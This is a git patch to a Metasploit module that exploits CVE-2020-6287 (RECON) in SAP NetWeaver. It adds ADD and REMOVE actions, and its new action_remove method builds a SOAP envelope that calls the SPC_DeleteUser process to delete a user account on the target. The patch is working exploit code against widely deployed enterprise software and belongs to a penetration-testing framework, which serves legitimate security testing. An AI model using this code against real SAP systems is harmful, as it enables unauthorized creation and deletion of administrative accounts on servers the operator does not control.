From ff4db5daeac984845ebccd3ed34db41f8a37e7aa Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Thu, 23 Jul 2020 17:16:05 -0400
Subject: [PATCH] Add the REMOVE action to the exploit for CVE-2020-6287

---
 .../admin/sap/cve_2020_6287_ws_add_user.rb    | 46 +++++++++++++++++++
 1 file changed, 46 insertions(+)

diff --git a/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb b/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb
index d3986fa7ed..55b551b726 100644
--- a/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb
+++ b/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb
@@ -31,6 +31,11 @@ class MetasploitModule < Msf::Auxiliary
         'Notes' => {
           'AKA' => [ 'RECON' ]
         },
+        'Actions' => [
+          [ 'ADD', { 'Description' => 'Add the specified user' } ],
+          [ 'REMOVE', { 'Description' => 'Remove the specified user' } ]
+        ],
+        'DefaultAction' => 'ADD',
         'DisclosureDate' => '2020-07-14'
       )
     )
@@ -66,6 +71,15 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
+    case action.name
+      when 'ADD'
+        action_add
+      when 'REMOVE'
+        action_remove
+    end
+  end
+
+  def action_add
     job = nil
     print_status('Starting the PCK Upgrade job...')
     job = invoke_pckupgrade
@@ -118,6 +132,38 @@ class MetasploitModule < Msf::Auxiliary
     end
   end
 
+  def action_remove
+    message = { name: 'DeleteUser' }
+    message[:data] = Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+      <root>
+        <username secure="true">#{datastore['USERNAME'].encode(xml: :text)}</username>
+      </root>
+    ENVELOPE
+
+    envelope = Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
+        <soapenv:Header/>
+        <soapenv:Body>
+          <urn:executeSynchronious>
+              <identifier>
+                <component>sap.com/tc~lm~config~content</component>
+                <path>content/Netweaver/ASJava/NWA/SPC/SPC_DeleteUser.cproc</path>
+             </identifier>
+             <contextMessages>
+                <baData>#{Rex::Text.encode_base64(message[:data])}</baData>
+                <name>#{message[:name]}</name>
+             </contextMessages>
+          </urn:executeSynchronious>
+         </soapenv:Body>
+      </soapenv:Envelope>
+    ENVELOPE
+
+    res = send_request_soap(envelope)
+    fail_with(Failure::UnexpectedReply, 'Failed to delete the user') unless res&.code == 200
+
+    print_good('Successfully deleted the user account')
+  end
+
   def report_error_details(job)
     print_error('Received a general error notification')
     error_event = job.get_event